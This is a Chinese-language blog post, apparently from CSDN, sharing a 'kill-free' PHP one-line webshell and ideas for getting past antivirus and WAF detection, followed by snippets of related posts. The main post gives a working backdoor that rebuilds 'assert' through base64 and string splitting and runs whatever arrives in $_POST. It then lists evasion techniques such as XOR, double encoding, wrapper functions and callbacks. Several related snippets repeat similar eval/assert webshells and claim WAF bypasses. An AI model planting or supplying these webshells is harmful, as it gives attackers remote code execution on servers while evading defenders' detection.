PHP一句话 免杀思路 分析

最新推荐文章于 2024-08-22 20:44:44 发布
最新推荐文章于 2024-08-22 20:44:44 发布
阅读量387 收藏 1
点赞数
分类专栏: 免杀 web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/119176717
版权
web 同时被 2 个专栏收录
25 篇文章 4 订阅
订阅专栏
免杀
1 篇文章 0 订阅
订阅专栏

php免杀以及一个免杀的小马分享

没什么技术含量,但是主要是学思路

推荐新手观看

小马

通过base64编码,然后拆分了函数关键字,通过变量的引用等,然后@不报错,eval不能拆分使用

<?php 
$b=sert;
$c=base64_encode($b);
$d='as'.base64_decode($c);
@$d($_POST['1']);
?>

很简单,然后还有下面是升级版免杀思路

免杀思路

异或函数的一个字母

用双重加密来绕过

弱类型绕过

函数封装绕过

function test($a){eval($a);}test($_POST['x']);

其他函数的替换

replace等替换函数的使用

变量覆盖来绕过

函数回调绕过

最后后

也有加强版的,但是还是只分享思路,然后供大家学习,只做伸手党也不太好。

HoAd's blog
关注
专栏目录
PHP一句话 免杀
10-23
PHP一句话 免杀
php一句话木马免杀
qq_58683895的博客
11-21 2038
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3241
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
PHP一句话木马免杀方式汇总
最新发布
qq_48368964的博客
08-22 890
create_function函数把用户传递的数据生成一个函数fun(),然后再执行fun()php$fun();?
PHP一句话木马免杀
小刚的博客
07-26 6526
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 &lt.
PHP一句话木马免杀
墨痕诉清风的博客
10-07 5903
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句话木马免杀(通过VirusTotal测试)
m0_52233414的博客
01-28 3497
通过拼接,编码,加密等方法对PHP一句话木马进行免杀处理
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
牛逼的一句话木码
Daoke37的博客
05-10 354
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
php一句话后门学习(含免杀
weixin_50464560的博客
03-06 2839
本人freebuf文章:https://www.freebuf.com/articles/web/264582.html php一句话后门 开发很久的可利用函数 eval和assert php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_POST['a']) ?> 但由于eval不能拆分,早期也有人喜欢用assert,这样通过编码和拆分assert,隐蔽性更高 <?php @assert($_POST['a']) ?> 虽
深入探索PHP免杀技术及其防护策略
weixin_43822401的博客
07-03 473
免杀技术指的是通过各种手段修改或加密Webshell代码,使其不被安全软件识别的技术。这项技术在网络安全攻防演练中具有重要地位。D盾是一款专为IIS设计的主动防御保护软件,提供多种安全防护功能,包括一句话免疫、主动后门拦截等,以增强服务器的安全性。PHP免杀技术是网络安全领域中攻防双方技术较量的一部分。作为防御方,了解免杀技术的原理和实现方法对于加强防护至关重要。同时,通过采取有效的防护策略,可以显著提高Web应用的安全性,抵御免杀Webshell的威胁。
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5287
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
PHP免杀方法
wutiangui的博客
06-07 906
/ 函数变形 assert 达到免杀(免除杀毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1828
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
免杀原理(php)
diaobusi的博客
11-24 534
总结一下思路,首先要定位哪一行代码,会被杀软拦截,接着分析为什么会被拦截,最后根据现有线索去猜测拦截规则,从而绕过杀软拦截。
不可不学!一些webshell免杀的技巧
Appleteachers的博客
05-07 870
一些webshell免杀的技巧 0x00:前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值